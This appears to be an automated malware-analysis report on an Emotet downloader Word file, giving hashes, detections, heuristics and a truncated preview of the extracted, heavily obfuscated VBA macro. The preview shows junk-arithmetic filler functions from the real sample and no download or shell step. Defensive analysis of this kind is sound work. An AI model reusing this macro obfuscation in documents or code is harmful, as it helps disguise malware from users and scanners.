Emotet Office (OLE) malware analysis — malicious · 4bb52ddb53632bbf

MALICIOUS

Office (OLE)

169.0 KB Created: 2018-07-23 20:18:00 Authoring application: Microsoft Office Word First seen: 2019-04-17

MD5: 4182362f7a11d676573daec8d561e40f SHA-1: 0af9a481e2e4e67fa31fdda96458e006fc118f02 SHA-256: 4bb52ddb53632bbf53b14dafbf5c220145c352e0ba2deeeaa3983b5c8c9d0068

182 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file was detected as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6877415-0', indicating it is likely an Emotet downloader. The presence of a 'Document_Open' macro and a 'Shell()' call within the VBA code strongly suggests that the macro is designed to execute arbitrary commands, typically to download and run a secondary payload. The VBA code itself is heavily obfuscated, making it difficult to determine the exact download URL or execution method without further dynamic analysis.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6877415-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6877415-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34939 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	34939 bytes
SHA-256: `6a4b9ecbda03ee3194920923ab8f4f1c2529ae614234427affa23c3155fe0d94`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "aYGpPNl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function ojPGTtjaHCRQkL() On Error Resume Next If dpKHq Xor OUAipc Then vhfiG = (73007 - IfJjX * 1860 + dbBskz - (37544 / tpdjM)) ElseIf ctowtQ Or 76698 Then If SGPEPO And jajpEk Then wqEdCi = Hex(pFXZoj) End If Umdktl = CDbl(17914 - 88678) End If If YnmvD Xor SCVVsE Then lDAJsj = (41213 - izWrd * 16469 + apiBW - (60770 / dCSuq)) ElseIf QINmQf Or 36781 Then If kIGYjV And nQEaqO Then jrriAk = Hex(wrztX) End If Wmjawp = CDbl(43881 - 82240) End If If rlzTrL Xor FmdVrB Then jIhiw = (89216 - Eapqh * 76360 + hVoIsL - (10842 / dwCdj)) ElseIf UpXrZ Or 72517 Then If JiBMp And nLHdJ Then DYQpN = Hex(pQTiif) End If LEjkS = CDbl(98130 - 15791) End If If jEPMOt Xor Hsjuzs Then OFDcB = (85772 - aiMLoG * 9662 + zjEOY - (88630 / SbaLdS)) ElseIf wrWuNV Or 75352 Then If jsjAIV And Banpv Then ApiUVQ = Hex(cBqPNi) End If VousjY = CDbl(35767 - 5995) End If If XlbPaA Xor nWEwB Then arEzEi = (4314 - nijhM * 62320 + FWZzcD - (93121 / pXBBRb)) ElseIf ZqTAUA Or 58384 Then If NYKKk And siOTd Then zizYkd = Hex(PcCck) End If wEtOLM = CDbl(89448 - 53082) End If If YSsMd Xor pnhntr Then ruQqsO = (92318 - vZSnC * 97168 + CHjGB - (35664 / GrRdSn)) ElseIf vwwFJ Or 4480 Then If uVBMC And ctaZb Then UkaEnp = Hex(QoZZOw) End If wAcTh = CDbl(85864 - 92695) End If End Function Private Function WvnkAZYaw() On Error Resume Next If ZPokv Xor HzHXw Then iiLqF = (32551 - iWLbF * 46459 + nARwj - (44234 / EpCiqR)) ElseIf LcdLi Or 75412 Then If AYmYNO And wOniMc Then GhIoZU = Hex(tJMPz) End If WuhPX = CDbl(71047 - 52231) End If If LDwho Xor dZnlr Then nwQKVU = (38422 - bWjNmL * 15326 + PQWZZL - (68552 / rtjlzZ)) ElseIf wdJhd Or 90536 Then If zwKka And WkucNC Then XPRSb = Hex(dSbki) End If CVikdi = CDbl(58444 - 61389) End If If wEmww Xor JrSLW Then uKtzMJ = (31034 - WRSLPK * 9672 + dXUjW - (41290 / QAXZv)) ElseIf BrHAwt Or 51393 Then If aMQio And hmajnD Then OuqpbY = Hex(dwpjU) End If UZLLS = CDbl(33452 - 58279) End If If faVIOH Xor OviolF Then VXJSRH = (28994 - JNKKC * 62267 + LbBoi - (3659 / SQGSRu)) ElseIf lKTRz Or 23839 Then If OSJjMG And IwDFv Then jCnwas = Hex(FsMzpU) End If YCqsC = CDbl(38435 - 60532) End If If sIRvR Xor SCMWE Then iXWrGZ = (75653 - GJqsw * 86585 + HKCbK - (74561 / uoIzWu)) ElseIf JnTPap Or 59556 Then If Bwusa And iRZzY Then KrKvt = Hex(qciiJC) End If vwWXdY = CDbl(7266 - 50393) End If If GjSLp Xor Wjzwp Then RdXWf = (98481 - lTmrz * 60051 + MuvZU - (59363 / iDPaj)) ElseIf QMzJE Or 4900 Then If ftzHtE And CpUoT Then jAcnad = Hex(tiZIv) End If wlYTcm = CDbl(94587 - 99310) End If End Function Private Function ioAGjIJFztiL() On Error Resume Next If frLci Xor jvlEYM Then cTNtAX = (58786 - wqMjp * 32196 + oRaNFp - (65594 / XKjWw)) ElseIf wNMUEm Or 16800 Then If jJirBh And zwtYk Then UdLHJ = Hex(IqiQBi) End If AcALki = CDbl(80840 - 79913) End If If VjJkZ Xor EMBHl Then Csdujp = (48424 - GYVQF * 97318 + JbljX - (28457 / JqcUKu)) ElseIf onoMqW Or 92336 Then If SjJAiI And Ntfbzu Then PbNOCi = Hex(SMfikR) End If hDOcLd = CDbl(18539 - 3845) End If If hFEwOj Xor aIOjF Then CsifK = (77927 - NtCZA * 249 + iAWJw - (5951 / BDmiq)) ... (truncated)

SHA-256: 6a4b9ecbda03ee3194920923ab8f4f1c2529ae614234427affa23c3155fe0d94

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "aYGpPNl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ojPGTtjaHCRQkL()
On Error Resume Next
   If dpKHq Xor OUAipc Then
      vhfiG = (73007 - IfJjX * 1860 + dbBskz - (37544 / tpdjM))
      ElseIf ctowtQ Or 76698 Then
      If SGPEPO And jajpEk Then
         wqEdCi = Hex(pFXZoj)
      End If
      Umdktl = CDbl(17914 - 88678)
   End If
   If YnmvD Xor SCVVsE Then
      lDAJsj = (41213 - izWrd * 16469 + apiBW - (60770 / dCSuq))
      ElseIf QINmQf Or 36781 Then
      If kIGYjV And nQEaqO Then
         jrriAk = Hex(wrztX)
      End If
      Wmjawp = CDbl(43881 - 82240)
   End If
   If rlzTrL Xor FmdVrB Then
      jIhiw = (89216 - Eapqh * 76360 + hVoIsL - (10842 / dwCdj))
      ElseIf UpXrZ Or 72517 Then
      If JiBMp And nLHdJ Then
         DYQpN = Hex(pQTiif)
      End If
      LEjkS = CDbl(98130 - 15791)
   End If
   If jEPMOt Xor Hsjuzs Then
      OFDcB = (85772 - aiMLoG * 9662 + zjEOY - (88630 / SbaLdS))
      ElseIf wrWuNV Or 75352 Then
      If jsjAIV And Banpv Then
         ApiUVQ = Hex(cBqPNi)
      End If
      VousjY = CDbl(35767 - 5995)
   End If
   If XlbPaA Xor nWEwB Then
      arEzEi = (4314 - nijhM * 62320 + FWZzcD - (93121 / pXBBRb))
      ElseIf ZqTAUA Or 58384 Then
      If NYKKk And siOTd Then
         zizYkd = Hex(PcCck)
      End If
      wEtOLM = CDbl(89448 - 53082)
   End If
   If YSsMd Xor pnhntr Then
      ruQqsO = (92318 - vZSnC * 97168 + CHjGB - (35664 / GrRdSn))
      ElseIf vwwFJ Or 4480 Then
      If uVBMC And ctaZb Then
         UkaEnp = Hex(QoZZOw)
      End If
      wAcTh = CDbl(85864 - 92695)
   End If
End Function
Private Function WvnkAZYaw()
On Error Resume Next
   If ZPokv Xor HzHXw Then
      iiLqF = (32551 - iWLbF * 46459 + nARwj - (44234 / EpCiqR))
      ElseIf LcdLi Or 75412 Then
      If AYmYNO And wOniMc Then
         GhIoZU = Hex(tJMPz)
      End If
      WuhPX = CDbl(71047 - 52231)
   End If
   If LDwho Xor dZnlr Then
      nwQKVU = (38422 - bWjNmL * 15326 + PQWZZL - (68552 / rtjlzZ))
      ElseIf wdJhd Or 90536 Then
      If zwKka And WkucNC Then
         XPRSb = Hex(dSbki)
      End If
      CVikdi = CDbl(58444 - 61389)
   End If
   If wEmww Xor JrSLW Then
      uKtzMJ = (31034 - WRSLPK * 9672 + dXUjW - (41290 / QAXZv))
      ElseIf BrHAwt Or 51393 Then
      If aMQio And hmajnD Then
         OuqpbY = Hex(dwpjU)
      End If
      UZLLS = CDbl(33452 - 58279)
   End If
   If faVIOH Xor OviolF Then
      VXJSRH = (28994 - JNKKC * 62267 + LbBoi - (3659 / SQGSRu))
      ElseIf lKTRz Or 23839 Then
      If OSJjMG And IwDFv Then
         jCnwas = Hex(FsMzpU)
      End If
      YCqsC = CDbl(38435 - 60532)
   End If
   If sIRvR Xor SCMWE Then
      iXWrGZ = (75653 - GJqsw * 86585 + HKCbK - (74561 / uoIzWu))
      ElseIf JnTPap Or 59556 Then
      If Bwusa And iRZzY Then
         KrKvt = Hex(qciiJC)
      End If
      vwWXdY = CDbl(7266 - 50393)
   End If
   If GjSLp Xor Wjzwp Then
      RdXWf = (98481 - lTmrz * 60051 + MuvZU - (59363 / iDPaj))
      ElseIf QMzJE Or 4900 Then
      If ftzHtE And CpUoT Then
         jAcnad = Hex(tiZIv)
      End If
      wlYTcm = CDbl(94587 - 99310)
   End If
End Function
Private Function ioAGjIJFztiL()
On Error Resume Next
   If frLci Xor jvlEYM Then
      cTNtAX = (58786 - wqMjp * 32196 + oRaNFp - (65594 / XKjWw))
      ElseIf wNMUEm Or 16800 Then
      If jJirBh And zwtYk Then
         UdLHJ = Hex(IqiQBi)
      End If
      AcALki = CDbl(80840 - 79913)
   End If
   If VjJkZ Xor EMBHl Then
      Csdujp = (48424 - GYVQF * 97318 + JbljX - (28457 / JqcUKu))
      ElseIf onoMqW Or 92336 Then
      If SjJAiI And Ntfbzu Then
         PbNOCi = Hex(SMfikR)
      End If
      hDOcLd = CDbl(18539 - 3845)
   End If
   If hFEwOj Xor aIOjF Then
      CsifK = (77927 - NtCZA * 249 + iAWJw - (5951 / BDmiq))

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.